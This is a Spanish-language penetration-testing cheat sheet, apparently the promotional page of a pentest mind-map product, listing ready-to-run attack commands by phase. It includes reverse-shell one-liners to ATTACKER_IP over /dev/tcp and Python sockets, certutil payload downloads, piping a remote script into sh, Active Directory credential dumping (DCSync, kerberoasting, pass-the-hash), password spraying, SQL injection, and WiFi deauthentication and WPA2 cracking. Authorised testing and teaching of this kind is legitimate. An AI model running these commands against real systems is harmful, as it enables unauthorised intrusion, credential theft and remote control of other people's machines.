# Reconocimiento
La recopilación de información es la base de todo pentest. Comienza con reconocimiento pasivo y luego pasa al escaneo activo.
Nmap — Descubrimiento de Red
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP
nmap -sU --top-ports 200 TARGET_IP
nmap --script vuln TARGET_IP
Enumeración de Subdominios y DNS
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN
Fuerza Bruta de Directorios y Archivos
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Hacking de Aplicaciones Web
Prueba las vulnerabilidades del OWASP Top 10: SQLi, XSS, SSRF, IDOR, bypass de autenticación y más.
Inyección SQL
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF y LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Esenciales de Burp Suite
curl -x http://127.0.0.1:8080 -k https://TARGET
# Servicios de Red
Protocolos y servicios comunes en pentests: SMB, FTP, SSH, HTTP, SNMP.
Enumeración SMB
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares
FTP
ftp TARGET_IP # Probar anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Escalada de Privilegios Linux
Después de obtener una shell, escala a root. Revisa SUID, capabilities, cron jobs y exploits de kernel.
Scripts de Enumeración
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Binarios SUID
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Mala Configuración de Sudo
sudo -l
/etc/passwd con Escritura
openssl passwd -1 -salt hacker password123
# Escalada de Privilegios Windows
Escala de usuario con pocos privilegios a SYSTEM. Suplantación de tokens, abuso de servicios, rutas sin comillas.
Enumeración
winPEASany.exe quiet fast searchfast
whoami /priv
Suplantación de Tokens
.\GodPotato.exe -cmd "cmd /c whoami"
Rutas de Servicio sin Comillas
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Active Directory
Pentesting AD: enumerar usuarios, kerberoasting, AS-REP roasting, pass-the-hash, DCSync.
Enumeración
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
# Ataques de Contraseñas
Crackear hashes, fuerza bruta en servicios y pulverización de credenciales en la red.
Cracking de Hashes
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Fuerza Bruta Online
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Pulverización de Contraseñas
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
# Post-Explotación
Después de obtener acceso: establecer persistencia, pivotar, exfiltrar datos.
Transferencia de Archivos
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Mejorar Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # En atacante
chisel client ATTACKER_IP:8000 R:socks # En objetivo
# Ataques Inalámbricos
Pentesting WiFi: capturar handshakes, crackear WPA2, puntos de acceso falsos.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud y Kubernetes
Enumerar activos en la nube, explotar malas configuraciones en AWS, Azure, GCP y Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
📚 Recursos Relacionados
- Glosario de Pentesting — 60+ términos de ciberseguridad definidos para hackers éticos
- Cómo Empezar en Pentesting — Guía paso a paso con metodología y herramientas
¿Quieres 11.600+ comandos en un mapa mental interactivo?
Este cheatsheet muestra una fracción de lo que ofrece Pentest Mindmap. Obtén 32 categorías, búsqueda instantánea y copia en un clic — organizado como un hermoso mapa mental interactivo.
Prueba Gratis 7 Días →